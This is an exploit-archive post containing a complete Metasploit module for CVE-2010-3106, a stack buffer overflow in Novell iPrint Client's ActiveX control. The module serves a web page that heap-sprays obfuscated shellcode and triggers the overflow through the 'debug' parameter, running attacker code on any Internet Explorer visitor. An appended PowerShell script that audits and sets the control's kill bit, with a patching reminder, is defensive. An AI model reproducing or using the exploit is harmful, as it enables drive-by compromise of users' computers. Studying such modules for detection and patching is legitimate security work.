
[remote exploits] - Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit

Posted on 21 September 2010

====================================================================
Novell iPrint Client ActiveX Control 'debug' Buffer Overflow Exploit
====================================================================

##
# novelliprint_executerequest_dbg.rb
#
# Novell iPrint Client ActiveX Control 'debug' Buffer Overflow exploit for the Metasploit Framework
#
# Exploit successfully tested on the following platforms:
# - Novell iPrint Client 5.32 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows XP SP3
# - Novell iPrint Client 5.40 on Internet Explorer 7, Windows Vista SP2
#
# ienipp.ocx version tested:
# File Version: 5.3.2.0 and 5.4.0.0
# ClassID: 36723F97-7AA0-11D4-8919-FF2D71D0D32C
# RegKey Safe for Script: True
# RegKey Safe for Init: True
# KillBitSet: False
#
# References:
# - CVE-2010-3106
# - OSVDB 66960
# - http://dvlabs.tippingpoint.com/advisory/TPTI-10-06 - Original advisory by Aaron Portnoy, TippingPoint DVLabs
# - http://www.exploit-db.com/exploits/15001/ - MOAUB #14 exploit
# - http://www.exploit-db.com/moaub-14-novell-iprint-client-browser-plugin-executerequest-debug-parameter-stack-overflow/ - MOAUB #14 binary analysis
# - http://www.rec-sec.com/2010/09/21/novell-iprint-debug-buffer-overflow-exploit/ - Metasploit exploit by Trancer, Recognize-Security
#
# Trancer
# http://www.rec-sec.com
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell iPrint Client ActiveX Control debug Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack-based buffer overflow in Novell iPrint Client 5.40.
				When sending an overly long string to the 'debug' parameter in ExecuteRequest()
				property of ienipp.ocx an attacker may be able to execute arbitrary code.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Trancer <mtrancer[at]gmail.com>' ],
			'Version'        => '$Revision:$',
			'References'     =>
				[
					[ 'CVE', '2010-3106' ],
					[ 'OSVDB', '66960' ],
					[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-10-06' ], # Aaron Portnoy, TippingPoint DVLabs
					[ 'URL', 'http://www.exploit-db.com/exploits/15001/' ],          # MOAUB #14
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP0-SP2 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0A0A0A0A, 'Offset' => 250 } ]
				],
			'DisclosureDate' => 'Aug 04 2010',
			'DefaultTarget'  => 0))
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)
		# Re-generate the payload.
		return if ((p = regenerate_payload(cli)) == nil)

		# Encode the shellcode.
		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

		# Setup exploit buffers
		nops      = Rex::Text.to_unescape([target.ret].pack('V'))
		ret       = Rex::Text.uri_encode([target.ret].pack('L'))
		blocksize = 0x40000
		fillto    = 500
		offset    = target['Offset']

		# ActiveX parameters
		clsid = "36723F97-7AA0-11D4-8919-FF2D71D0D32C"
		op    = "op-client-interface-version"
		dbg   = "debug="

		# Randomize the javascript variable names
		ienipp       = rand_text_alpha(rand(100) + 1)
		j_shellcode  = rand_text_alpha(rand(100) + 1)
		j_nops       = rand_text_alpha(rand(100) + 1)
		j_ret        = rand_text_alpha(rand(100) + 1)
		j_headersize = rand_text_alpha(rand(100) + 1)
		j_slackspace = rand_text_alpha(rand(100) + 1)
		j_fillblock  = rand_text_alpha(rand(100) + 1)
		j_block      = rand_text_alpha(rand(100) + 1)
		j_memory     = rand_text_alpha(rand(100) + 1)
		j_op         = rand_text_alpha(rand(100) + 1)
		j_dbg        = rand_text_alpha(rand(100) + 1)
		j_counter    = rand_text_alpha(rand(30) + 2)

		html = %Q|<html>
<object classid='clsid:#{clsid}' id='#{ienipp}'></object>
<script>
var #{j_shellcode} = unescape('#{shellcode}');
var #{j_nops} = unescape('#{nops}');
var #{j_headersize} = 20;
var #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length;
while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace});
var #{j_block} = #{j_nops}.substring(0,#{j_nops}.length - #{j_slackspace});
while (#{j_block}.length + #{j_slackspace} < #{blocksize}) #{j_block} = #{j_block} + #{j_block} + #{j_fillblock};
var #{j_memory} = new Array();
for (#{j_counter} = 0; #{j_counter} < #{fillto}; #{j_counter}++) { #{j_memory}[#{j_counter}] = #{j_block} + #{j_shellcode}; }
var #{j_ret} = '';
for (#{j_counter} = 0; #{j_counter} <= #{offset}; #{j_counter}++) { #{j_ret} += unescape('#{ret}'); }
#{j_op} = "#{op}";
#{j_dbg} = "#{dbg}";
#{ienipp}.ExecuteRequest(#{j_op}, #{j_dbg} + #{j_ret});
</script>
</html>|

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response(cli, html, { 'Content-Type' => 'text/html' })

		# Handle the payload
		handler(cli)
	end

end

# Inj3ct0r.com [2010-09-21]
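The module header records "KillBitSet: False" and "RegKey Safe for Script: True" for the ienipp.ocx control, which is what lets a web page instantiate it in Internet Explorer. The script below is an added defender-side example, not part of the original module: it audits whether the IE kill bit is set for the listed CLSID on both registry views and, with -Apply, sets it. It assumes an elevated PowerShell session; the value name and the 0x400 flag are the documented ActiveX Compatibility kill-bit convention.

```powershell
# Added example (not from the original module): audit, and optionally set, the IE
# kill bit for the ienipp.ocx control identified by the CLSID in the module header.
# Assumes an elevated session. 'Compatibility Flags' with bit 0x400 is the
# documented kill-bit setting under the ActiveX Compatibility key.
param([switch]$Apply)

$clsid   = '{36723F97-7AA0-11D4-8919-FF2D71D0D32C}'
$killBit = 0x400
$paths   = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    # 32-bit IE on 64-bit Windows reads the Wow6432Node view of the key
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

foreach ($p in $paths) {
    $flags = 0
    if (Test-Path $p) {
        $v = Get-ItemProperty -Path $p -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($v) { $flags = [int]$v.'Compatibility Flags' }
    }
    $set = ($flags -band $killBit) -ne 0
    $state = if ($set) { 'SET' } else { 'NOT set (control remains scriptable in IE)' }
    Write-Output ("{0}: kill bit {1}" -f $p, $state)

    if ($Apply -and -not $set) {
        # Create the key if absent, then OR the kill bit into any existing flags
        New-Item -Path $p -Force | Out-Null
        Set-ItemProperty -Path $p -Name 'Compatibility Flags' -Value ($flags -bor $killBit) -Type DWord
        Write-Output "  -> kill bit applied"
    }
}
```

Run without -Apply first to see the current state; the fix only takes effect for IE, so patching or removing the vulnerable iPrint Client version is still the primary remediation.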
